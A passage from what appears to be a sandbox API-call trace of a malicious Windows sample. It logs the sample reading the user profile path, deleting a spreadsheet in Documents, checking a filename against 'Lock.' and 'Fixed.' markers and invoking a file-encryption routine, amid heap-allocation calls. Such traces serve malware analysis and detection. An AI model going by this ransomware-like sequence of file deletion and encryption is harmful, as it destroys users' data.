wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0264.775] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0264.775] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518b0 | out: hHeap=0x970000) returned 1 [0264.775] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0264.775] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0264.775] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0264.775] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0264.775] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a28 [0264.775] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0264.775] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a28 | out: hHeap=0x970000) returned 1 [0264.775] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0264.776] CloseHandle (hObject=0x2d0) returned 1 [0264.777] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0264.777] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0264.777] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0264.777] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0264.777] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699c8 [0264.777] CloseHandle (hObject=0x2a0) returned 1 [0264.781] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0264.781] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0264.781] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518b0 [0264.781] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515e0 [0264.781] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0264.782] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0264.782] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0264.782] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0264.782] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0264.782] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf560, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0264.782] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0264.782] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0264.782] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c78 [0264.782] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bf8 [0264.782] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69c28 [0264.783] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0264.783] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e54858 [0264.783] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents/kw9ZLIvDnQk.xlsx", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\kw9ZLIvDnQk.xlsx", lpFilePart=0x8cedf4*="kw9ZLIvDnQk.xlsx") returned 0x2a [0264.783] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\kw9ZLIvDnQk.xlsx" (normalized: "c:\\users\\fd1hvy\\documents\\kw9zlivdnqk.xlsx")) returned 0x20 [0264.783] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\kw9ZLIvDnQk.xlsx", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7c6df6a0, ftCreationTime.dwHighDateTime=0x1d5abfb, ftLastAccessTime.dwLowDateTime=0xd7dbe6f0, ftLastAccessTime.dwHighDateTime=0x1d588ec, ftLastWriteTime.dwLowDateTime=0xd7dbe6f0, ftLastWriteTime.dwHighDateTime=0x1d588ec, nFileSizeHigh=0x0, nFileSizeLow=0xa81, dwReserved0=0x1, dwReserved1=0x1c, cFileName="kw9ZLIvDnQk.xlsx", cAlternateFileName="KW9ZLI~1.XLS")) returned 0xa87610 [0264.783] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\kw9ZLIvDnQk.xlsx" (normalized: "c:\\users\\fd1hvy\\documents\\kw9zlivdnqk.xlsx")) returned 1 [0264.815] FindNextFileW (in: hFindFile=0xa87610, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7c6df6a0, ftCreationTime.dwHighDateTime=0x1d5abfb, ftLastAccessTime.dwLowDateTime=0xd7dbe6f0, ftLastAccessTime.dwHighDateTime=0x1d588ec, ftLastWriteTime.dwLowDateTime=0xd7dbe6f0, ftLastWriteTime.dwHighDateTime=0x1d588ec, nFileSizeHigh=0x0, nFileSizeLow=0xa81, dwReserved0=0x1, dwReserved1=0x1c, cFileName="kw9ZLIvDnQk.xlsx", cAlternateFileName="KW9ZLI~1.XLS")) returned 0 [0264.815] FindClose (in: hFindFile=0xa87610 | out: hFindFile=0xa87610) returned 1 [0264.816] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54858 | out: hHeap=0x970000) returned 1 [0264.816] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0264.816] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0264.816] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0264.816] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0264.816] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0264.816] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0264.816] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0264.816] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0264.816] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf560, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0264.816] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0264.816] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0264.816] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0264.816] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0264.816] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0264.816] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0264.816] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e54858 [0264.816] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0264.816] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0264.816] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0264.816] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0264.816] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0264.816] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0264.816] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0264.817] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0264.817] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0264.817] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0264.817] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0264.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0264.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0264.817] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0264.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x56) returned 0x2e558d8 [0264.817] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents/kw9ZLIvDnQk.xlsx", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\kw9ZLIvDnQk.xlsx", lpFilePart=0x8cf650*="kw9ZLIvDnQk.xlsx") returned 0x2a [0264.817] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0264.817] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\kw9ZLIvDnQk.xlsx" (normalized: "c:\\users\\fd1hvy\\documents\\kw9zlivdnqk.xlsx")) returned 0xffffffff [0264.817] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54858 | out: hHeap=0x970000) returned 1 [0264.817] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0264.817] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0264.817] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0264.817] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0264.817] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0264.817] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0264.817] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77b08 | out: hHeap=0x970000) returned 1 [0264.817] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0264.817] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0264.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0264.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0264.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0264.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0264.818] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0264.818] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0264.818] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0264.818] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0264.818] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0264.818] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0264.818] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0264.818] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0264.818] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0264.818] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kZP09G.docx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0264.818] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ZP09G.docx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0264.818] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="P09G.docx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0264.818] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="09G.docx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0264.818] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="9G.docx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0264.818] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="G.docx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0264.818] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".docx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0264.818] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0264.818] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0264.818] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0264.818] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0264.818] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0264.818] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0264.818] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0264.818] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77788 [0264.818] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0264.818] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0264.818] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0264.818] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0264.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0264.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0264.819] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0264.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0264.819] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0264.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0264.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0264.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0264.819] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0264.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0264.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0264.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0264.819] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0264.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0264.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bc8 [0264.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69c08 [0264.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c68 [0264.819] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kZP09G.docx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0264.819] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ZP09G.docx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0264.819] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="P09G.docx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0264.819] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="09G.docx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0264.819] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="9G.docx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0264.819] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="G.docx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0264.819] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0264.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0264.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0264.819] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0264.819] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0264.820] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0264.820] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0264.820] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0264.820] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0264.820] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0264.820] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0264.820] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0264.820] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0264.820] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9779f8 | out: hHeap=0x970000) returned 1 [0264.820] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0264.820] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53878 | out: hHeap=0x970000) returned 1 [0264.820] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e539b0 [0264.820] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0264.820] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0264.820] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ca8 [0264.820] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0264.820] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0264.820] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ca8 | out: hHeap=0x970000) returned 1 [0264.820] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0264.820] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0264.820] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54d48 [0264.820] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0264.820] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0264.820] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0264.820] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf4d0, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0264.820] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0264.820] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0264.820] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0264.821] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0264.821] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0264.821] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0264.821] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e54858 [0264.821] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0264.821] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0264.821] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0264.821] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0264.821] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0264.821] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0264.821] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0264.821] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0264.821] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0264.821] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0264.821] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0264.821] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54d68 [0264.821] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0264.821] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0264.821] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf4d0, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0264.822] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0264.822] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0264.822] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0264.822] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0264.822] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0264.822] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0264.822] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e558d8 [0264.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0264.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0264.822] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0264.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0264.822] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0264.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0264.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0264.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0264.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0264.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54e38 [0264.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0264.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0264.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0264.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0264.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54ed8 [0264.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51748 [0264.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0264.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0264.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e515e0 [0264.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79338 [0264.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51670 [0264.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0264.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51670 | out: hHeap=0x970000) returned 1 [0264.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0264.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51790 [0264.823] RtlAllocateHeap 